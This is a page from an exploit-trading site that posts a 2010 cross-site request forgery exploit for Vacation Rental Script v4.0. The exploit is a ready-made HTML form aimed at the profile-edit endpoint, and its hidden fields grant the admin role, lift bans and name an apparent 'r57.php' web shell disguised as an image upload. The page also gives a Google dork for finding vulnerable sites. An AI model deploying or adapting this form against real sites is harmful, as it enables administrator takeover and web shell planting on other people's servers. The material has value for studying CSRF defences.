[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Vacation Rental Script v4.0 XSRF Vulnerability

Author
OnurTURKESHAN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15243
Category
web applications
Date add
26-12-2010
Platform
php
# Exploit Title: Vacation Rental Script v4.0 XSRF VULNERABILTY
# Google Dork: "2006 - 2009 Vacation Rental Script"
# Date: 24.12.2010
# Author: OnurTURKESHAN
# Software Link: http://www.vacationrentalscript.com/
# Version: v.4.0
# Tested on: v4.0 TEsted +WorKs
#ResPecT My FrienDz : BARC0D3-SZE-BlackApple-Fl0rix-Sky_Lab-Ufuq-VoLqaN-KaBaDaYı-BraveHeart-CWScriptKiddiE-FinishedLife AND ALL MY FRIENDZ
---------------------------------------------
<form id="users_edit" method="post" action="http://SÄ°TE.COM/home/members/profile/edit/MEMBERÄ°D" enctype="multipart/form-data">
    <input type="hidden" name="profile_logo" id="profile_logo" value="r57.php-2.jpeg" />
    <input type="hidden" name="role" id="role" value="admin" />
    <input type="hidden" name="banned" id="banned" value="0" />
                    <input class="text" type="text" id="user_name" name="user_name" value="USERNAME" />
                    <input class="text" type="text" id="email" name="email" value="MAIL@MAIL.COM" />
                    <input class="text" type="password" id="password" name="password"  />
                    <input class="text" type="password" id="retype_password" name="retype_password"  />
                    <input class="btn-orange" type="submit" value="Save profile" id="submit" name="submit" /><div class="btn-orange-end"> </div>
       
    </form>
 
www.myfreshdate.com / www.onurturkeshan.com / www.cyber-warrior.org



#  0day.today [2024-10-06]  #